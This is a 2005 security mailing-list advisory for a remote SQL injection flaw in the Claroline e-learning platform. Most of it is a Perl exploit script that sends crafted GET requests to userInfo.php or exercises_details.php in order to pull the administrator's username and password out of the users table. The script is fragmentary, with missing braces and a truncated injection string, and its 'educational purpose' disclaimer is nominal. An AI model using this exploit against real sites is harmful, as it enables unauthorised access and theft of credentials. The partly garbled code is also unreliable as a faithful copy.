From: SecuriTeam <>
To: [email protected]
Date: 19 Jun 2005 18:44:07 +0200
Subject: [EXPL] Claroline E-Learning Application Remote SQL Injection
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Claroline E-Learning Application Remote SQL Injection
Claroline is "an Open Source software based on PHP /MySQL. It's a
collaborative learning environment allowing teachers or education
institutions to create and administer courses through the web". An SQL
Injection vulnerability has been discovered discovered in Claroline
E-Learning, the following exploit code will return the username and
password of the administrator user of the product.
# Claroline E-Learning Application Remote SQL Exploit
# [K-C0d3r]
# This tools and to consider only himself to educational purpose
# Bug discovered by
# Greetz to mZ, 2b TUBE, off, rikky, str0ke, x0n3-h4ck, MWC
# [K-C0d3r]
use IO::Socket;
sub Usage {
print STDERR "Usage: <> <path/dir>
print STDERR "Targets:\n1 - userInfo.php\n";
print STDERR "2 - exercises_details.php\n";
if (@ARGV < 3)
if (@ARGV > 3)
if (@ARGV == 3)
$host = @ARGV[0];
$path = @ARGV[1];
$target = @ARGV[2];
print "[K-C0d3r] Claroline E-Learning Application Remote SQL Exploit
print "[+] Connecting to $host\n";
$sqli =
$sqli .= "%20FROM%20pn_users%20WHERE%20pn_uid=2/*";
$socket = new IO::Socket::INET (PeerAddr => "$host", PeerPort => 80,
print "[+] Injecting command ...\n";
if ($target == 1)
print $socket "GET http://$host/$path/userInfo.php?uInfo=-1$sqli
HTTP/1.1\nHost: $host\n\n Connection: Close\r\n\r\n";
while (<$socket>)
print $_;
if ($target == 2)
print $socket "GET
http://$host/$path/exercises_details.php?uInfo=-1$sqli HTTP/1.1\nHost:
$host\n\n Connection: Close\r\n\r\n";
while (<$socket>)
print $_;
The information has been provided by K-C0d3r.
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